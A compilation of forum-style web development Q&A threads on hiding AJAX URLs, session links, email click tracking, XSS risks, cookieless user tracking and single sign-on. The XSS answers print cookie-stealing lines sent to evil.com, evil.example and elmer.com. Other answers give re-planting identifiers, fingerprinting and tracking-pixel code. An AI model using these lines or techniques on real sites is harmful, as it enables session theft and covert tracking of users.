I am using AJAX on my website, and in order to use it I have to write the name of the file, for example:
id = "123";
$.getJSON(jquerygetevent.php?id=" + id, function(json)
{
//do something
});
How can I protect the URL? I don't want people to see it and use it...
That is a limitation of using client-side scripts: there is no real way to hide it from the user. There are many ways to make it less readable (minification etc.), but in the end an end user can still view the code.
Hi Ron and welcome to the internet. The internet was (to quote Wikipedia on the subject)
The origins of the Internet reach back to research of the 1960s, commissioned by the United States government in collaboration with private commercial interests to build robust, fault-tolerant, and distributed computer networks. The funding of a new U.S. backbone by the National Science Foundation in the 1980s, as well as private funding for other commercial backbones, led to worldwide participation in the development of new networking technologies, and the merger of many networks. The commercialization of what was by the 1990s an international network resulted in its popularization and incorporation into virtually every aspect of modern human life.
Because of these origins, and because of the way the protocols surrounding HTTP resource identification (such as URLs) were designed, there's not really any way to prevent this. Had the internet been developed as a commercial venture initially (think AOL), then they might have been able to get away with preventing the browser from showing the new URL to the user.
So long as people can "view source" they can see the URLs in the page that you're referring them to visit. The best you can do is to obfuscate the links using javascript, but at best that's merely an annoyance. What can be decoded for the user can be decoded for a bot.
Welcome to the internet, may your stay be a long one!
I think the underlying issue is why you want to hide the URL. As everyone has noted, there is no way to conceal the actual resolved URL. Once it is triggered, Firebug gives you everything you need to know.
However, is the purpose to prevent a user from re-using the URL? Perhaps you can generate one-time, session-relative URLs that can only be used in the given HTTP Session. If you cut/paste this URL to someone else, they would be unable to use it. You could also set it to expire if they tried to Refresh. This is done all the time.
Is the purpose to prevent the user from hacking your URL by providing a different query parameter? Well, you should be handling that on the server side anyway, checking whether the user is authorized. Even before activating the link, the user can use a tool like Firebug to edit your client-side code as much as they want. I've done this several times to live sites when they're not functioning the way I want :)
UPDATE: A HORRIBLE hack would be to drop an invisible Java Applet on the page. They can also trigger requests and interact with Javascript. Any logic could be included in the Applet code, which would be invisible to the user. This, however, introduces additional browser compatibility issues, etc, but can be done. I'm not sure if this would show up in Firebug. A user could still monitor outgoing traffic, but it might be less obvious. It would be better to make your server side more robust.
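To illustrate the one-time, session-relative URL idea above: the page embeds a freshly issued token, and the AJAX endpoint refuses anything it has not issued or has already seen, on top of the usual authorization check. The sketch below uses Node.js purely for illustration (the question's endpoint is PHP), and every name in it is hypothetical; in a real app the token set would live in the server-side session.
// Sketch of one-time, session-relative tokens plus a server-side authorization check.
const crypto = require('crypto');

const issued = new Set();                            // tokens embedded in pages, not yet used

function issueToken() {
    const token = crypto.randomBytes(16).toString('hex');
    issued.add(token);
    return token;                                    // print this into the page that makes the AJAX call
}

function consumeToken(token) {
    return issued.delete(token);                     // true exactly once; replayed or pasted URLs fail
}

// Stand-ins for the real permission check and data lookup:
function userMayAccess(user, id) { return Boolean(user); }
function loadEvent(id) { return { id: id }; }

// What the AJAX endpoint would do with ?id=...&token=...
function handleRequest(sessionUser, id, token) {
    if (!consumeToken(token)) return { status: 403, error: 'expired or reused link' };
    if (!userMayAccess(sessionUser, id)) return { status: 403, error: 'not authorized' };
    return { status: 200, data: loadEvent(id) };
}

console.log(handleRequest('elmer', '123', issueToken()));   // succeeds the first time only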
Why not put some form of security on your PHP script instead, such as checking a session variable or something like that?
EDIT in response to comment:
I think you've maybe got the cart before the horse somehow. URLs are by nature public addresses for resources. If the resource shouldn't be publicly consumable except in specific instances (i.e. from within your page), then it's a question of defining and implementing security for the resource. In your case, if you only want the resource called once, then why not place a single-use access key into the calling page? Then the resource will only be delivered when the page is refreshed. I'm unsure as to why you'd want to do this, though: does the resource expose sensitive information? Is it perhaps very heavy on the server to run the script? And if the resource should only be used to render the page once, rather than update it once it's rendered, would it perhaps be better to implement it server-side?
You can protect (hide) anything on the client only by encrypting/encoding it into a format that is complicated for a real human to read.
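For what that kind of obfuscation looks like in practice, here is a small sketch based on the question's own $.getJSON call: the endpoint is stored base64-encoded and only decoded at runtime. It deters casual readers at best; anyone can paste the string into atob() themselves.
// The endpoint is kept base64-encoded and decoded only when the request is made.
// This hides nothing from a determined user; it is obfuscation, not protection.
var encoded = "anF1ZXJ5Z2V0ZXZlbnQucGhwP2lkPQ==";   // btoa("jquerygetevent.php?id=")
var id = "123";
$.getJSON(atob(encoded) + id, function (json) {
    // do something with the response
});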
Okay, this may sound like a stupid question, but this actually is a real life situation I gotta sort out.
The company I work for is using a rather outdated online shop software (PHP) which is hosted on the company's server. Unfortunately, the source code is encrypted and the CMS does not allow me to add any PHP code either, so I guess I'm stuck with JavaScript on this one.
Let's say we have a huge sale start coming up and people start sharing links via YouTube, Twitter, and so on. Due to the software being made somewhere in the last century, some links still contain session IDs which will definitely be shared by some users. This, however, will result in multiple users placing orders on the same customer account or even worse, overwriting existing customer accounts with new customer data.
I know that this situation is far from ideal and that the software definitely needs an update, but this is not an option at the moment. I also know that I'm not getting a 100% solution, so I'm just going to try to prevent people from accidentally wrecking some customer data.
That being said, I thought about checking the URL for a session ID and checking the value in document.referrer as well. If the URL contains a session ID and the referrer is some other server than ours, I'll just do a quick redirect to the main landing page. Again: this is meant to prevent the average user from accidentally logging into someone else's account by clicking on a bad link; I'm not trying to prevent proper session hijacking here.
Any ideas on this one? Are there any situations where the referrer might not contain actual values, e.g. the browser not sending referrers at all? Any other ways to sort this out using JavaScript only?
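A minimal client-side sketch of the check described above. The session parameter name ("sid") and the landing-page path are placeholders and would need to match whatever the shop software actually uses; note that document.referrer can legitimately be empty (direct visits, some privacy settings), which this treats as internal, and that URLSearchParams/URL need a reasonably modern browser.
// Redirect to the landing page when the URL carries a session ID and the visitor
// arrived from another site. "sid" and "/" are placeholders for the real values.
(function () {
    var params = new URLSearchParams(window.location.search);
    if (!params.has("sid")) return;                        // no session ID in the URL, nothing to do

    var referrer = document.referrer;                      // may be empty; treat that as internal
    var external = referrer !== "" &&
                   new URL(referrer).hostname !== window.location.hostname;

    if (external) {
        window.location.replace("/");                      // drop the foreign session, go to the landing page
    }
})();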
This may be a bit of a tricky one (for me at least, but you guys may be smarter). I need to capture the timestamp of exactly when a reader clicks a link in an email. However, this link is not a hyperlink to another webpage. It is a link formatted as a GET request with query strings that will automatically submit a form.
Here is the tricky part: the form processing is not handled by PHP or .NET or any other server-side language. It is a form engine that is hosted and managed by a cloud-based marketing platform that captures and displays the form submission data (so I have no access to the code behind the scenes).
Now, if this wasn't an email I'd say it is simple enough to just use JavaScript. However, JavaScript doesn't work well with email, if at all (I'm just assuming there are some email clients out there that support JavaScript).
How would you go about capturing the timestamp for when the link is clicked without using any type of scripting? Is this even possible?
The best solution I could come up with was to have the link point to an intermediate page with JavaScript to capture the timestamp and then redirect to the form submission. The only problem with that is that it captures the timestamp of the page load, not of the actual click.
There is no way to do what you want "without any type of scripting". If no scripting is done, no functionality may be added or changed.
The best option is the very one you suggested: use an intermediary page that records the request time. Barring unusual circumstances (such as a downed server), the time between a link being clicked and the request reaching the server will be less than 1 second.
Do you really need a higher resolution or accuracy than ~1s? What additional gain is there from having results on the order of milliseconds or microseconds? I can't imagine a scenario in which you'd have tangible benefits from such a thing, though if you do have one I'd love to hear it.
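As a sketch of that intermediary step, assuming the email link is pointed at a server you control first: log the arrival time, then forward the query string on to the hosted form. Node.js is used here only for illustration; the path and the form URL are made up.
// Minimal "click recorder": note the request time, then redirect to the real form.
const http = require('http');

http.createServer((req, res) => {
    const url = new URL(req.url, 'http://localhost');
    if (url.pathname === '/click') {
        // The server clock at the moment the request arrives is the click timestamp.
        console.log('clicked at', new Date().toISOString(), 'query:', url.search);
        res.writeHead(302, { Location: 'https://forms.example.com/submit' + url.search });
        return res.end();
    }
    res.statusCode = 404;
    res.end();
}).listen(8080);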
My initial thought was to say that what you're trying to do can't be done without some scripting capability, but I suppose it truly depends on what you're trying to accomplish overall.
While there is ambiguity in what you're trying to accomplish from what you have written, I'm going to make an assumption: you're trying to record interaction with a particular email.
Depending on the desired resolution, this is very possible--in fact--something that most businesses have been doing for years.
To begin my explanation of the technique, consider this common functionality in most mail clients (web-based or otherwise):
Click here to display images below
The reason for this existing is that the images that are loaded into the message that you're reading often come from a remote server not hosted by the mail client. In the process of requesting that image, a great deal of information about yourself is given to that outside server via HTTP headers in your request including, among other things, a timestamp for the request. Thus the above button is used to prevent that from happening without your consent.
That said, it's also important to note how other mail client providers, most notably Gmail, are approaching this now. The aforementioned technique is so common (used by advertisers and by other, more nefarious parties for the purposes of phishing, malware, etc.) that Google has decided to start caching all mail images themselves. The result is that the email looks exactly the same, but all requests for images are instead directed at Google's cached versions.
Long story short, you can get a timestamp to note interaction with an email via an image request, but such metric collection in general, regardless of whether it's done in the manner I've outlined, is something mail clients try to prevent, at least at some level.
EDIT: To relate this back to your idea of having some intermediary page, you could skip that page and instead point an image request towards a server you control.
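A sketch of that image-request approach: the email contains a tiny image whose URL points at a server you control, and the timestamp of the image request is your metric. Again Node.js is only for illustration, the path and query parameter are placeholders, and the image caching described above can blunt this.
// Serve a 1x1 transparent GIF and log when (and for whom) it was requested.
const http = require('http');

const PIXEL = Buffer.from('R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7', 'base64');

http.createServer((req, res) => {
    const url = new URL(req.url, 'http://localhost');
    if (url.pathname === '/pixel.gif') {
        console.log('loaded at', new Date().toISOString(), 'recipient:', url.searchParams.get('r'));
        res.writeHead(200, { 'Content-Type': 'image/gif', 'Cache-Control': 'no-store' });
        return res.end(PIXEL);
    }
    res.statusCode = 404;
    res.end();
}).listen(8080);

// In the email body: <img src="http://your-server.example/pixel.gif?r=123" width="1" height="1">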
I just happened to read Joel's blog here...
So for example if you have a web page that says “What is your name?” with an edit box and then submitting that page takes you to another page that says, Hello, Elmer! (assuming the user’s name is Elmer), well, that’s a security vulnerability, because the user could type in all kinds of weird HTML and JavaScript instead of “Elmer” and their weird JavaScript could do narsty things, and now those narsty things appear to come from you, so for example they can read cookies that you put there and forward them on to Dr. Evil’s evil site.
Since JavaScript runs on the client, all it can access or do is on the client.
It can read information stored in hidden fields and change it.
It can read, write or manipulate cookies...
But I feel this information is available to him anyway (if he is smart enough to pass JavaScript into a textbox), so we are not empowering him with new information or giving him undue access to our server...
Just curious to know whether I miss something. Can you list the things that a malicious user can do with this security hole?
Edit: Thanks to all for the enlightening answers. As kizzx2 pointed out in one of the comments, I was overlooking the fact that JavaScript written by User A may get executed in the browser of User B under numerous circumstances, in which case it becomes a great risk.
Cross-site scripting (XSS) is a really big issue with JavaScript injection.
It can read, write or manipulate cookies
That's the crucial part. You can steal cookies like this: simply write a script which reads the cookie and sends it to some evil domain using AJAX (with JSONP to get around the cross-domain issues; in fact, I think you don't even need to bother with AJAX, a simple <img src="http://evil.com/?cookieValue=123"> would suffice), and email yourself the poor guy's authentication cookie.
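Spelled out, the no-AJAX version of that cookie theft is just a dynamically created image whose URL carries the data (evil.example is a placeholder):
// What an injected script can do: read the victim's cookies and smuggle them out
// in an image request. No AJAX, no cross-domain problem.
var img = new Image();
img.src = "http://evil.example/steal?cookie=" + encodeURIComponent(document.cookie);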
I think what Joel is referring to in his article is that the scenario he describes is one which is highly vulnerable to Script Injection attacks, two of the most well known of which are Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF).
Since most web sites use cookies as part of their authentication/session management solution, if a malicious user is able to inject malicious script into the page markup that is served to other users, that malicious user can do a whole host of things to the detriment of the other users, such as steal cookies, make transactions on their behalf, replace all of your served content with their own, create forms that imitate your own and post data to their site, etc, etc.
There are answers that explain CSRF and XSS. I'm the one to say that for the particular quoted passage, there is no security threat at all.
That quoted passage is simple enough -- it allows you to execute some JavaScript. Congratulations -- I can do the same with Firebug, which gives me a command line to play with, instead of having to fake it by abusing a text box that some website gives me.
I really think Joel wasn't really sober when writing that. The example was just plain misleading.
Edit: some more elaboration:
We should keep several things in mind:
Code cannot do any harm unless executed.
JavaScript can only be executed on the client side (yes, there is server-side JavaScript, but apparently not in the context of this question/article).
If the user writes some JavaScript, which then gets executed on his own machine -- where's the harm? There is none, because he can execute JavaScript from Firebug anytime he wants without going through a text box.
Of course there is CSRF, which other people have already explained. The only case where there is a threat is where User A can write some code which gets executed on User B's machine.
Almost all answers that directly answer the question "What harm can JavaScript do?" explain in the direction of CSRF -- which requires User A being able to write code that User B can execute.
So here's a more complete, two part answer:
If we're talking about the quoted passage, the answer is "no harm"
I do not interpret the passage's meaning to mean something like the scenario described above, since it's very obviously talking about a basic "Hello, Elmer world" example. To synthetically induce implicit meanings out of the passage just makes it more misleading.
If we're talking about "What harm can JavaScript do, in general," the answer is related to basic XSS/CSRF
Bonus: here are a couple more real-life scenarios of how a CSRF (User A writes JavaScript that gets executed on User B's machine) can take place:
A Web page takes parameters from GET. An attacker can lure a victim to visit http://foo.com/?send_password_to=malicious.attacker.com
A Web page displays one user's generated content verbatim to other users. An attacker could put something like this in his avatar's URL: <script>send_your_secret_cookies_to('http://evil.com')</script> (this needs some tweaking to get past quoting etc., but you get the idea).
Cause your browser to send requests to other services using your authentication details and then send the results back to the attacker.
Show a big picture of a penis instead of your company logo.
Send any personal info or login cookies to a server without your consent.
I would look at the Wikipedia article on JavaScript security. It covers a number of vulnerabilities.
If you display data on your page that comes from a user without sanitizing that data first, it's a huge security vulnerability, and here's why:
Imagine that instead of "Hello, Elmer!", that user entered
<script src="http://a-script-from-another-site.js" type="text/javascript"></script>
and you're just displaying that information on a page somewhere without sanitizing it. That user can now do anything he wants to your page without other users coming to that page being aware. They could read the other users' cookie information and send it anywhere they want, they could change your CSS and hide everything on your page and display their own content, they could replace your login form with their own that sends information to any place they wish, etc. The real danger is when other users come to your site after that user. No, they can't do anything directly to your server with JavaScript that they couldn't do anyway, but what they can do is get access to information from other people that visit your site.
If you're saving that information to a database and displaying it, all users who visit that site will be served that content. If it's just content that's coming from a form that isn't actually saved anywhere (submitting a form and you're getting the data from a GET or POST request) then the user could maliciously craft a URL (oursite.com/whatsyourname.php?username=Elmer but instead of Elmer, you put in your JavaScript) to your site that contained JavaScript and trick another user into visiting that link.
For an example with saving information in a database: let's say you have a forum that has a log in form on the front page along with lists of posts and their user names (which you aren't sanitizing). Instead of an actual user name, someone signs up with their user name being a <script> tag. Now they can do anything on your front page that JavaScript will accomplish, and every user that visits your site will be served that bit of JavaScript.
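As a rough sketch of what "sanitizing" means here (normally done server-side before the value is ever echoed; this client-side version is only to show the idea, and the "greeting" element id is a placeholder):
// Escape the characters that let user input break out of plain text and become markup.
function escapeHtml(value) {
    return String(value)
        .replace(/&/g, "&amp;")
        .replace(/</g, "&lt;")
        .replace(/>/g, "&gt;")
        .replace(/"/g, "&quot;")
        .replace(/'/g, "&#39;");
}

var userName = '<img src=x onerror="alert(1)">';   // a hostile "name" instead of "Elmer"
document.getElementById("greeting").innerHTML = "Hello, " + escapeHtml(userName) + "!";
// Rendered as literal text, the payload never runs. Using textContent instead of
// innerHTML sidesteps the problem entirely for plain-text values.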
A little example shown to me a while ago during an XSS class.
Suppose Elmer is amateur hacker. Instead of writing his name in the box, he types this:
<script>$.ajax("http://elmer.com/save.php?cookie=" + document.cookie);</script>
Now if the server keeps a log of the values written by users and some admin logs in and views those values, Elmer will get that administrator's cookie!
Let's say a user reads your source code and makes his own tweaked version of, for instance, an AJAX call that posts unwanted data to your server. Some developers are good at protecting direct user input, but might not be as careful protecting database calls made from an AJAX call, where the developer thinks he has control of all the data being sent through the call.
OK... I'm looking to have a good round of brainstorming here...
Say I was Google (the AdWords/AdSense/Analytics division). I would be getting a little worried about the future, when users start to disable cookies (or at least delete them on a regular basis), use private browsing, and roam on multiple devices. How could Google alternatively track users without the benefit of cookies?
Some ideas to get started (please elaborate on these and any others):
- track users using some other persistent local/client-side storage
- use user-agent string fingerprinting
- test the cache response - if a user 304's an image, they were here
- track the MAC address
- any random/out-of-the-box ideas?
Take a look at http://samy.pl/evercookie/. It's a JS API for ultra-persistent cookies, but you can take ideas from its mechanism to find storage for your data.
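The pattern evercookie relies on, reduced to just a couple of stores, looks roughly like this (evercookie itself uses many more hiding places):
// Write the same identifier into several client-side stores and restore it from
// whichever one survives, so clearing a single store is not enough to "forget" the user.
function getPersistentId() {
    var id = window.localStorage.getItem("uid") ||
             (document.cookie.match(/(?:^|; )uid=([^;]+)/) || [])[1];

    if (!id) {
        id = Math.random().toString(36).slice(2);          // placeholder ID generator
    }

    // Re-plant it everywhere on every visit.
    window.localStorage.setItem("uid", id);
    document.cookie = "uid=" + id + "; path=/; max-age=31536000";
    return id;
}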
I think you could do it using custom URLs. You would basically encrypt a cookie and attach it as part of the URL you send to the browser. When it comes back, your web server would be smart enough to decode it and track whoever sent it.
I believe the Spring framework can do this, in fact.
If your site requires user tracking, then I would have it fail to work if cookies are disabled. Then focus your time and effort on making it a fantastic site for the vast majority of your visitors, and don't worry about the ones who, for whatever reason, have made the explicit decision to disable cookies.
(Made this a CW answer because this is a subjective question that's likely to be closed.)
Information about the browser/system/display through JS, and the IP address of course;
A Java applet provides a lot of info about the user;
Flash does too (e.g. installed fonts);
Modern browsers also provide a lot of information about users (e.g. installed extensions) and offer new ways to save information on the client side (e.g. HTML5 storage).
Altogether: http://panopticlick.eff.org/
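A crude sketch of the fingerprinting idea behind Panopticlick: combine a handful of properties that differ between machines into one identifier (the real thing hashes many more signals and is far more discriminating):
// A few signals that vary between users, joined into a naive fingerprint string.
var fingerprint = [
    navigator.userAgent,
    navigator.language,
    screen.width + "x" + screen.height + "x" + screen.colorDepth,
    new Date().getTimezoneOffset(),
    navigator.plugins.length
].join("|");
console.log(fingerprint);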
You can always resort to the good old way: the hit counter.
On the page, use an image tag linking to an external image on your server.
On your server, when the image is fetched, redirect the request to a PHP script through .htaccess and record the header info about the device etc. {similar code to that used for disabling image hotlinking}.
Now you have all the info; use php_session() to keep track of it.
You can always use JS for the same purpose, but using the image tag will ensure that JS is not required and the tracking will work in all browsers.
Okay, this just feels plain nasty, but I've been directed to do it, and just wanted to run it past some people who actually have a clue, so they can point out all the massive holes in it.....so here goes.....
We've got this legacy site & a new public beta-test one. Apparently it's super cereal that moving from one to the other is seamless, so in a manner of speaking, we need a single signon solution.
As we're not allowed to put any serious development into the legacy site (it's also in old-school ASP, a language I don't care to learn), I can't do a proper single sign-on solution, so I proposed the following: on login, the legacy site performs an AJAX post to the login controller of the new beta site, logging the user in there; it then simply proceeds with the login on the legacy site as normal. This may not be acceptable, as there's code to prevent a user from being logged on twice, and I'm not sure whether it's been written to apply across sites.
The other idea I had was to pass a salted hash of the user's details across with their username when they try to access the 2nd site. If the hash matches the details of the user, then access is granted. This would need ASP development obviously as generating the hash on the client side would only serve to enhance the idiocy even further.
Does anyone have any thoughts?
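For the second idea, a keyed hash (HMAC) over the user details plus an expiry, computed with a secret both sites share, is the usual shape. A rough sketch follows; Node.js crypto is used only to show the calculation, the legacy ASP site would have to produce the same value when it builds the link, and every name below is a placeholder.
// Sign and verify a cross-site logon link: HMAC(username|expiry) keyed with a shared secret.
const crypto = require('crypto');

const SECRET = 'shared-secret-known-to-both-sites';       // never sent to the browser

function signUser(username, expires) {
    return crypto.createHmac('sha256', SECRET)
                 .update(username + '|' + expires)
                 .digest('hex');
}

function verifyUser(username, expires, signature) {
    if (Date.now() > Number(expires)) return false;        // stale links are rejected
    const expected = signUser(username, expires);
    if (signature.length !== expected.length) return false;
    return crypto.timingSafeEqual(Buffer.from(expected), Buffer.from(signature));
}

// Link built by the first site:
const exp = Date.now() + 5 * 60 * 1000;                    // valid for five minutes
const link = '/sso?user=alice&exp=' + exp + '&sig=' + signUser('alice', exp);
console.log(link, verifyUser('alice', String(exp), signUser('alice', exp)));   // true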
The old ASP site must have some concept of a session if it requires a logon. You will, at a minimum, need to understand how to provide the session information to the legacy site and splice some code in to keep it copacetic if both sites need to be kept up indefinitely.
"Classic" ASP isn't so bad if you can read/write VB6, VBA, VBScript or VB.net. It probably won't be difficult to graft session initialization provided the code is half way decent.
Consider creating a common logon page for both sites + either an automatic redirect based on either the requested URL (I'm guessing the old and new sites have distinct URLs) or cookies passed with the request (the old site, if it used cookies, could identify a legacy user). This common logon page could initialize session on both the legacy site (only if required by user type) and on the new site. This will allow you to keep your new logon process unencumbered by the legacy process while maintaining the old as long as required.
Bear in mind that your first approach (AJAX request from one site to the other) won't work if the sites are on different domains, because of javascript security restrictions.
You might be able to work around this by using a hidden iframe for the post like this, but it's getting a little hacky.